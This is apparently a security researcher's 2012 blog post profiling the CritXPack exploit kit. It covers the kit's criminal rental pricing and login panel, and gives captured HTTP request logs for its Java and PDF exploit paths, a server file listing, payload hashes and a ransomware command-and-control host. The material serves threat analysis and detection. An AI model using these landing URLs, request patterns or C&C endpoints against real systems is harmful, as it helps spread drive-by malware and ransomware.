2012-11-12 - Connect the dots.
Meet CritXPack (Previously Vintage Pack)
 |
| CritXPack |
It was named Vintage Pack at that time :
The enrollment form was simple :
 |
| Vintage Pack form to apply |
Cтоимость аренды: в месяц - 400$, в неделю - 100$
which Google Translate as :
Cost of rent: a month - $ 400 a week - $ 100
Few days ago the banner/name changed. Here is the new "apply" form :
 |
| CritXPack apply form |
Here is the text :
Rent: 30$ - 1 day; 150$ - 1 week; 500$ - 1 month; traffic limit - 100k hits per day.
License on your server: 600$ - 3 month; 900$ - 6 month; 1200$ - 1 year; +200$ - multidomain license.
ЗЫ: Мы сменили баннер и название, которое было использовано в течение тестового периода и проведения пробной рекламной акции. Сейчас связка работает в штатном режиме, название и баннер меняться не будут. На профильных форумах в данный момент никакой рекламы НЕТ. Отзывы от наших партнеров, пользующихся связкой и имеющих репутацию на соответствующих форумах, можно получить в ЧАСТНОМ порядке и только в случае их согласия.
Google Translate for the Russian part :
PS: We have changed the banner and the name that was used during the test period and the Pilot promotion. Now a bunch of works in normal mode, the name and the banner will not change. On specialized forums are currently no ads NO. Reviews from our partners who use a bunch and have a reputation in the appropriate forums, you can get in private and only if they consent.
And thanks to Jindrich Kubec from Avast who shared yesterday an unusual URL pattern
 |
| Jindrich Kubec tweet about the new kind of Url |
we can now say hello to CritXPack.
 |
| CritXPack Login Screen 2012-11 Note the Captcha (3rd time i see this on bad guy panel, after Upas then Blackhole 2.0) |
 |
| Updated Login Screen (2013-02) |
There are some double tilt counter measures (you'll get a 502 error)
There are some Geolocation features (it seems - could be filter outside of the EK) :
 |
| Filter in action for localized strike. |
I tested different vuln path on it :
CVE-2012-1723 (seems safe (?!) )
 |
| CVE-2012-1723 path on CritXPack (safe) |
GET http://magrety.herapid .org/b081112s/i.php
200 OK (text/html)
GET http://magrety.herapid .org/b081112s/j.php?t=u0059u0053u0072u0074u0035u0044u0053u0053u0053u0046
200 OK (application/java-archive) -- 65571830100b0d809b44fefc094b5bf4
 |
| 65571830100b0d809b44fefc094b5bf4 nicely tagged in VirusTotal |
CVE-2012-4681 Boom...
 |
| CVE-2012-4681 path in CritXPack |
GET http://magrety.herapid .org/b081112s/i.php
200 OK (text/html)
GET http://magrety.herapid .org/b081112s/j.php?t=u0059u0053u0072u0074u0035u0044u0053u0031u0072u0072
200 OK (application/java-archive)
GET http://magrety.herapid .org/b081112s/j.php?t=u0059u0053u0072u0074u0035u0044u0053u0031u0072u0072
200 OK (application/java-archive)
GET http://magrety.herapid .org/b081112s/load.php?e=u004au0061u0076u0061&token=u0064u0065u0066u0061u0075u006cu0074&
200 OK (application/octet-stream)
MDAC path (Seems safe)
 |
| MDAC path on CritXPack safe but see : PluginDetect 0.7.9 :) |
GET http://magrety.herapid .org/b081112s/i.php
200 OK (text/html)
GET http://magrety.herapid .org/b081112s/js/pd.js
200 OK (application/javascript)
CVE-2011-2010 path (seems safe):
 |
| CVE-2011-2010 Path on CritXPack (safe) |
GET http://magrety.herapid .org/b081112s/i.php
200 OK (text/html)
GET http://magrety.herapid .org/b081112s/js/pd.js
200 OK (application/javascript)
GET http://magrety.herapid .org/b081112s/a.Test
404 Not Found (text/html)
CVE-2010-0188 Boom...
 |
| CVE-2010-0188 path in CritXPack |
GET http://magrety.herapid .org/b081112s/i.php
200 OK (text/html)
GET http://magrety.herapid .org/b081112s/js/pd.js
304 Not Modified ()
GET http://magrety.herapid .org/b081112s/a.Test
404 Not Found (text/html)
GET http://magrety.herapid .org/b081112s/p5.php?t=u0059u0053u0072u0074u0035u0044u0072u0072u0035u0031&oh=ZFhYT3N6ekxGakhpWFo5ZGlIRk82ZjlVSGp6bEQ1IyMjWUJ6b1VGZjlPZE9SaU00RERBRDRERHJTNEREcnJwWFVQaT1NNEREclM0RERyQTRERHJyNEREciM0REQxQTRERHJXNEREMVNw
200 OK (application/pdf) -- d23236aaa9756f74d51c42e5109d7927
GET http://magrety.herapid .org/b081112s/load.php?e=u0050u0064u0066&token=u0064u0065u0066u0061u0075u006cu0074&
200 OK (application/octet-stream)
CVE-2011-3544 Boom...
 |
| CVE-2011-3544 Path on CritXPack |
GET http://magrety.herapid .org/b081112s/i.php
200 OK (text/html)
GET http://magrety.herapid .org/b081112s/js/pd.js
200 OK (application/javascript)
GET http://magrety.herapid .org/b081112s/j.php?t=u0059u0053u0072u0074u0035u0044u0031u0041u0035u0044
200 OK (application/java-archive)
GET http://magrety.herapid .org/b081112s/load.php?e=u004au0061u0076u0061&token=u0064u0065u0066u0061u0075u006cu0074&
200 OK (application/octet-stream)
CVE-2012-0507 Boom...
 |
| CVE-2012-0507 path on CritXPack |
GET http://magrety.herapid .org/b081112s/i.php
200 OK (text/html)
GET http://magrety.herapid .org/b081112s/js/pd.js
200 OK (application/javascript)
GET http://magrety.herapid .org/b081112s/j.php?t=u0059u0053u0072u0074u0035u0072u0072u0035u0053u0035
200 OK (application/java-archive)
GET http://magrety.herapid .org/b081112s/load.php?e=u004au0061u0076u0061&token=u0064u0065u0066u0061u0075u006cu0074&
200 OK (application/octet-stream)
What about the file tree of the server ?
Here are some the dir/files I was able to see:
/b081112s/load.php
/b081112s/cpt.php
/b081112s/panel.php
/b081112s/captcha.php
/b081112s/i.php
/b081112s/j.php
/b081112s/f/
/b081112s/config.php
/b081112s/img/space.png
/b081112s/img/btn_signin.png
Out of the scope of this post but what about the payload ?
a6a61216942a1de358c5b55d8fb66cb1 yesterday
and b333ccb16027f0e168ff1846ea913a58 something with a C&C here :
lezniklitoristorii .in POST /image/ukash-psk/price.php HTTP/1.1
In my opinion it's in direct relation with the Ransomware Casier/GangstaService Affiliate. You remember ?
IE (Ireland) != IR (Iran) (any feedback on the payload is welcome :). It's maybe just a Zbot/Citadel).
For the files all in one Zip :
 |
| Content of the Zip |
Want to read more about CVEs and Exploit Kits ?
Common Exploit Kits 2012 Poster - 2012-11-11 Mila - Contagio
Wild Wild West - 2012-23-10 - Kahu Security
An Overview of Exploit Packs (Update 17) October 12, 2012 - 2012-10-12 Mila - Contagio
Want to read more about the payload ?
Casier on botnets.fr
Ransomware Casier - Sharing Design with Lyposit - Gaelic & Persian (?) - 2012-09-19
Ransomware « Trojan.Casier » Panel - 2012-09-18 - Malekal Morte - Malekal's Site
Karagny.L unpack - 2012-09-04 - RootBsd - Malware.lu technical analysis
Gangstaservice Winlock Affiliate - 2012-08-01 - Xylitol - Xylibox
Post Publication :
Got Malware? Rent an Exploit Service - Kevin Stevens - The Day Before Zero - Damballa - 2013-01-29
Meet Safe Pack (v2.0)... Again :) - 2013-04-21